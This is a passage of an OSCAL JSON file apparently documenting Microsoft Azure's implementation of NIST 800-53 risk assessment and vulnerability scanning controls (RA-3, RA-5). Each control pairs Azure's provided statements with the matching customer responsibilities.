NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems, Appendix F, Page F-7."}],"responsibilities":[{"uuid":"8637cfdb-7146-42b5-9262-a568d9b5b3f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-012"}],"description":"The customer is responsible for conducting a risk assessment and reviewing its results at a customer-defined frequency.","provided-uuid":"e80dd5b3-76bd-4990-8439-34d6759e1145"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"49ac9176-c347-4035-942c-4d89afc77b6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.e","by-components":[{"uuid":"c1ff338e-d16e-4677-a59f-d189ea961c96","export":{"provided":[{"uuid":"c5b85d04-db89-476d-8bc0-3399814c20eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-013"}],"description":"Azure submits risk assessment results to Azure management, including the Azure Program Managers. The annual SAR is submitted to the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required who review the package for sufficiency. Internally, the SAR is used to update the POA&M submissions."}],"responsibilities":[{"uuid":"e48d4eac-8c61-4e30-97d8-b3a517801001","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-013"}],"description":"The customer is responsible for conducting a risk assessment and disseminating its results to customer-defined personnel/roles.","provided-uuid":"c5b85d04-db89-476d-8bc0-3399814c20eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a31707c4-8add-42ae-9b67-1c3061eea2ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3_smt.f","by-components":[{"uuid":"535fcdb5-fb40-4049-81ff-a6f2c0141ed9","export":{"provided":[{"uuid":"7a494808-bb0d-43eb-8c3f-79034252eebf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-014"}],"description":"The risk assessment is completed as part of the original security authorization package and is updated by Microsoft annually, or when a significant change occurs as defined in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems, Appendix F, Page F-7. The information system may require an update to the risk assessment including, but not limited to, when one or more of the following circumstances occur: * Addition or replacement of a major component or a significant part of a major system * A change in security mode of operation * A change in interfacing systems * A significant change to the operating system or executive software * A breach of security, violation of system integrity, or any unusual situation that appears to invalidate the accreditation * A significant change to the physical structure housing the information system or environment of the information system that could affect the physical security described in the accreditation * A significant change to the threat that could adversely affect the systems * A significant change to the availability of safeguards * A significant change to the user population If any of these events should occur, the SSP and other affected Security Authorization Process documentation are updated to reflect the new information system components, or new operating environment. Changes are coordinated with the Azure authorizing officials and an updated package submitted for review and consideration."}],"responsibilities":[{"uuid":"af623a3a-33cc-4c58-977b-932a2762a9a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-014"}],"description":"The customer is responsible for updating the risk assessment at the customer-defined frequency, when there are significant changes to customer-deployed resources (including the identification of new threats and vulnerabilities), or other conditions that may impact the security state of the system.","provided-uuid":"7a494808-bb0d-43eb-8c3f-79034252eebf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5114b4f6-65cb-4fb8-9446-68022c051d62","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-3.1","statements":[{"uuid":"6018a1c5-2871-48a1-b197-f8c4aa654ae9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3.1_smt.a","by-components":[{"uuid":"420e47a6-4c53-40a0-96a3-a97797bf7628","export":{"provided":[{"uuid":"d0c57281-3ba4-4c42-88bb-0c22ffa24a94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-015"}],"description":"Azure: \"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The following efforts take place for Azure to assess and review the supply chain-related risks associated with Azure cloud components on an at least annual cadence. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"cf5f53ea-0cab-4beb-802d-58fcdbc55abe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-015"}],"description":"The customer is responsible for assessing supply chain risks associated with customer-defined and controlled systems, system components, and system services.","provided-uuid":"d0c57281-3ba4-4c42-88bb-0c22ffa24a94"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2e81bf35-090e-48ee-a0d8-a3236486f141","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-3.1_smt.b","by-components":[{"uuid":"02172944-3fd1-47e4-b070-da044955b43f","export":{"provided":[{"uuid":"77246db4-e125-4c7f-9d95-53cfaf932417","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-016"}],"description":"Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. Azure synchronizes internal system clocks deployed on Azure assets to GPS satellites. All Azure assets synchronize the internal system clocks to the authoritative time sources at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"9c5d5dbb-2c54-48ac-aa46-b6b26e575412","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-016"}],"description":"The customer is responsible for updating the supply chain risk assessment at a customer-defined frequency when there are significant changes to relevant supply chain, or when changes to the system, environments of operation, or other conditions may necessitate a change in the supply chain for customer-deployed resources.","provided-uuid":"77246db4-e125-4c7f-9d95-53cfaf932417"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"687a975a-6f66-4d52-858d-1f875fee6239","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5","statements":[{"uuid":"f9e7e680-55bc-45a2-8d16-70a960b00684","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.a","by-components":[{"uuid":"eb29ebd9-a55f-49e0-89ec-fdbf0d5fd484","export":{"provided":[{"uuid":"a49c346e-11ad-4255-aca6-67f26c140951","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-017"}],"description":"Azure implements vulnerability scanning by actively scanning servers, network devices, databases, and web applications in the Azure inventory with authenticated scans. All scans are performed monthly. The vulnerability scanning tools provide Azure updates as new vulnerabilities are identified and reported._x000D_ _x000D_ Scans are also performed when newly identified vulnerabilities are added for each type of scan. The C+AI VSA team within Azure manages the vulnerability management program and provides scanning services for the environment. C+AI VSA is responsible for the identification, assessment, and notification of vulnerabilities to Azure personnel, who are responsible for the remediation of verified vulnerabilities on operating systems, network elements and applications deployed in the Azure environment._x000D_ _x000D_ Listed below are the assets scanned each month in accordance with the monthly assignment:* Operating system (OS) Scans Conducted twice a day_x000D_ * Host, Guest, Native, and Pilotfish server environment_x000D_ * Physical server environment_x000D_ * Monthly operating system (OS) Scans_x000D_ * Azure network devices_x000D_ * Monthly database (DB) scans_x000D_ * SQL DB instances_x000D_ * Monthly web application scans_x000D_ * Web applications (hosted URLs)_x000D_ _x000D_ In addition, the Third Party Assessment Organization (3PAO) satisfies the requirements for independent third-party security assessment and scanning on an annual basis. This is done by having the Third Party Assessment Organization (3PAO) review the scanning configuration, observe the scan where possible, and review the results._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b28fd1db-35ec-45c5-a081-aa4f884465eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-017"}],"description":"The customer is responsible for performing periodic vulnerability scanning on all customer-deployed resources, including applications built on those resources. Customers are responsible for running scans of their applications running within or connected to their purchased Microsoft Azure VMs or deployments. Detailed information regarding customer implementations of threat mitigating security practices can be accessed through the external Microsoft Azure Trust Center page located here: http://azure.microsoft.com/en-us/support/trust-center.","provided-uuid":"a49c346e-11ad-4255-aca6-67f26c140951"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fda7ee47-6f7d-4b9e-83ff-136e9474a7ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.b","by-components":[{"uuid":"b3743ed7-e297-42bc-9fa0-852074bd484d","export":{"provided":[{"uuid":"de7e13c3-1b09-41dc-ad62-b82a00e67078","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-018"}],"description":"Azure employs automated vulnerability scanning tools to scan the Azure operating systems, databases, and web applications. The vulnerability scanning tools provide reporting data based on a number of existing, well-used, open standards that itemize software flaws, security configurations, and various product names, including the Common Vulnerabilities and Exposures (CVE) and Common Vulnerability Scoring System (CVSS). The following sections address the scanning tools and techniques used for each applicable Azure asset type. Azure utilizes a variety of well-known knowledge-based scan tools with the applicable plugins to run authenticated vulnerability scans on a predetermined number of servers depending on the asset type. Scan tool plugins are updated prior to scanning any hosts. Azure employs the following predetermined scanning methodologies to perform authenticated scans: Physical Servers 95% of Azure physical server operating systems are scanned with credentials using Qualys off-node, including database and web application hosts. All scans are authenticated. Physical Database Instances 95% of all physical databases are scanned with credentials using Qualys. Virtual Servers Authenticated scans are performed on 95% of Azure service team servers. Azure scans virtual servers using the Microsoft-specific Qualys off-node scanner. Virtual Database Instances Azure uses a SKU-based sampling methodology for authenticated databases instances. These scans are executed for database compliance checks. Azure databases are scanned with the VA Scan Tool. Web Applications 95% of all Azure web applications have authenticated scans run against each URL. Scans of all web applications are performed using Rapid7 AppSpider with applicable web application plug-ins enabled. This is referred to as WebScout internally. Network Devices 85% of Azure network devices are scanned with authenticated scans using Qualys."}],"responsibilities":[{"uuid":"c1c2c163-abcd-4112-932c-19a8590f66c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-018"}],"description":"The customer is responsible for employing vulnerability scanning tools and techniques that facilitate interoperability among tools and automate parts of the vulnerability management process.","provided-uuid":"de7e13c3-1b09-41dc-ad62-b82a00e67078"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"683ecfc0-adf9-439b-8120-b85d99dc2aa9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.c","by-components":[{"uuid":"06b1a1d5-94cb-49db-95f1-f9c1b71333cb","export":{"provided":[{"uuid":"cc53b148-d65a-475e-ba66-da33a494fae4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-019"}],"description":"The Vulnerability Management team assesses the vulnerability severity and impact level based on documented technology deployed and used in the Azure environment._x000D_ _x000D_ C+AI VSA collects information from a variety of vulnerability scanning tools to help determine the inventory of applications installed on servers to assess the current threat surface. Configuration checks are performed against the C+AI VSA managed Azure baselines. The C+AI Security team reviews configurations as part of the vulnerability scanning tool reports and performs a risk analysis in determining scores for impact and likelihood. Specific steps in the vulnerability process include:_x000D_ _x000D_ * Review mitigating controls that may affect the vulnerability rating such as implementation of firewalls, antivirus software, access control lists (ACLs), and more._x000D_ * Review the Asset Value for the affected assets._x000D_ * Determine the timeframe for the application of the required updates._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ac35db98-964d-43e1-ac0d-c75f12d783d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-019"}],"description":"The customer is responsible for analyzing scan reports and results from security control assessments.","provided-uuid":"cc53b148-d65a-475e-ba66-da33a494fae4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7a53f4f5-5d09-406c-b7f2-693e0c45b2b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.d","by-components":[{"uuid":"8fc2b456-8a31-48c1-a1a7-a1d8a96a5c1e","export":{"provided":[{"uuid":"ca1aa060-790b-41ab-9ec9-fd2fbd830bea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-020"}],"description":"Vulnerabilities are classified by risk and applicability to the environment with all vulnerabilities identified by C+AI VSA required to be remediated within thirty (30) days for high, ninety (90) days for moderate, and one hundred and eighty (180) days for low risk vulnerabilities. In addition, all verified security flaws are managed and tracked via the POA&M process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"84e1111d-5087-45d0-93d6-18f1f5eb68b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-020"}],"description":"The customer is responsible for remediating vulnerabilities in customer-deployed resources in accordance with the customer risk assessment.","provided-uuid":"ca1aa060-790b-41ab-9ec9-fd2fbd830bea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"53a554f5-ed35-438f-94b5-cdefeeb7e82a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5_smt.e","by-components":[{"uuid":"a1d573cf-6a26-464d-bb64-28d9d6ca6236","export":{"provided":[{"uuid":"491f446f-f79d-4148-b6b9-a89b71fd6233","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-021"}],"description":"The C+AI Vulnerability Management team regularly communicates relevant information obtained during the scanning process with the appropriate Microsoft's Online Services personnel to eliminate duplicate efforts and to facilitate the remediation process. Reporting of security vulnerabilities is conducted via the vulnerability management and reporting tool and focused e-mails. The vulnerability management and reporting tool provides reports based on multiple criteria, including property, server and security flaws identified from the vulnerability scans and is accessible by Azure personnel at any time. E-mail communication from the Vulnerability Management team is used to notify asset owners in cases of elevated risk or when expedited action is necessary._x000D_ _x000D_ In addition, Azure shares information obtained from the vulnerability scanning process and security control assessments with the ISSO/ISSM monthly via the Continuous Monitoring Reports and POA&M._x000D_ _x000D_"}],"responsibilities":[{"uuid":"247da3d1-a21c-4811-a0b4-14c11d1c1396","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-021"}],"description":"The customer is responsible for sharing information obtained from the vulnerability scanning process and security control assessments to help eliminate similar vulnerabilities across customer-deployed resources.","provided-uuid":"491f446f-f79d-4148-b6b9-a89b71fd6233"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"38459d9b-759c-4122-be24-ea883a46f51d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.2","statements":[{"uuid":"58f3f884-e516-465c-9a03-7d987cd64cf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.2_smt","by-components":[{"uuid":"9045cb49-164e-4f8b-9d41-45589312a17c","export":{"provided":[{"uuid":"5573f2e1-cdc1-472c-b4d2-23ac25d45cc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-022"}],"description":"The vulnerability scanning tools used within the Azure environment include the capability to readily update the list of information system vulnerabilities to be scanned. The tools release new vulnerability definitions as needed following the publication of Common Vulnerability and Exposures (CVE) information. New signature files are updated either before each scan or, for Qualys off-node scan signatures, at least weekly, with scans performed daily._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cb89553d-b2cf-4301-91cb-985823bea746","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-022"}],"description":"The customer is responsible for updating the list of vulnerabilities scanned prior to a new scan, when new vulnerabilities are identified and reported, and/or at the customer-defined frequency.","provided-uuid":"5573f2e1-cdc1-472c-b4d2-23ac25d45cc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c3d52ad9-59eb-4275-9d69-50f520096219","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.3","statements":[{"uuid":"a323fd0b-be98-456b-9c97-56ebb43f7724","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-023"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.3_smt","by-components":[{"uuid":"c6bb90e4-8298-4dd6-8b5f-98f957b20066","export":{"provided":[{"uuid":"86905d23-f9ed-42bb-81cf-d29a1021836d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-023"}],"description":"To meet the appropriate breadth and depth of coverage, Azure utilizes vulnerability scanning tools to conduct authenticated scans of all asset types within the Azure security authorization boundary. Vulnerability scans of the Azure web applications and databases are conducted using vulnerability scanning tools with applicable web application and database plug-ins enabled. All scanning results are based on the latest plugins available to ensure all areas are covered in appropriate depth. In addition, for database instance scanning, appropriate tools are used to ensure database compliance checks are enabled._x000D_ _x000D_"}],"responsibilities":[{"uuid":"67fd1564-d938-4814-a0dd-fbe5a9060a30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-023"}],"description":"The customer is responsible for employing vulnerability scanning procedures that identify the breadth and depth of coverage.","provided-uuid":"86905d23-f9ed-42bb-81cf-d29a1021836d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8b930363-0945-4c89-a69c-2b9b9e55ba2a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.4","statements":[{"uuid":"5e027f3d-d237-478b-84a7-85d3af0e16ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.4_smt","by-components":[{"uuid":"7347f704-fa8f-454e-9356-4b251de1ac4c","export":{"provided":[{"uuid":"32e68548-39a1-4e24-90fb-55ea1a08ecf5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-024"}],"description":"Microsoft's Marketing Communications team conducts weekly scans on search engines and media web sites such as Bing, Google, Twitter, and Facebook using keywords like Microsoft, Microsoft Datacenter, competitor names, product names, and more to identify any disclosed nonpublic information. Additionally, all publicly available white papers are updated and reviewed by the Marketing Communications team on a quarterly basis._x000D_ _x000D_ If any nonpublic information is identified as part of reviews, the Azure incident management process is followed to investigated and remediate the issue._x000D_ _x000D_"}],"responsibilities":[{"uuid":"da4b6cda-c2eb-4f7d-9fe1-b0ba4feb413c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-024"}],"description":"The customer is responsible for taking action in response to customer information that is discoverable by adversaries.","provided-uuid":"32e68548-39a1-4e24-90fb-55ea1a08ecf5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ebe3a096-2494-4169-b0cb-5869a157279d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.5","statements":[{"uuid":"1ca1b498-d2e9-4938-8f49-f2281313aa72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.5_smt","by-components":[{"uuid":"c1a113fe-5558-4c2f-8c74-a46b3ebb4fc0","export":{"provided":[{"uuid":"170a2208-9ff7-4f2b-9887-42082aad1003","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-025"}],"description":"Azure includes elevated access authorization to operating systems, databases, and web applications for authenticated vulnerability scanning to facilitate more thorough scanning. Azure utilizes vulnerability scanning tools to conduct authenticated scans of the devices within the Azure security authorization boundary. Vulnerability scans are conducted using vulnerability scanning tools with applicable web application and database plug-ins enabled or specialized tools where appropriate._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8fca46be-359f-47c2-899f-783cfbc53f47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-025"}],"description":"The customer is responsible for implementing privileged access for executing customer-defined vulnerability scanning activities.","provided-uuid":"170a2208-9ff7-4f2b-9887-42082aad1003"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"02339b72-5d80-4288-9459-a780f1c2e575","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.8","statements":[{"uuid":"7b86f092-382e-43a5-9c6f-bd82219ec971","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.8_smt","by-components":[{"uuid":"da6c9374-9b5f-4b7b-9175-7e3fcc57e2be","export":{"provided":[{"uuid":"8b0b67c7-967d-4a47-ad51-41c0bb4cc94d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-026"}],"description":"Azure implements audit review, analysis, and reporting through the use of Azure logging and monitoring tools for both server baselines and network devices. The automated tooling processes logs for anomalous activity and sends alerts and incident tickets as needed._x000D_ _x000D_ Additionally, to identify vulnerabilities, Azure conducts scans of operating systems, databases, and web applications in the Azure environment. Multiple sources of information for 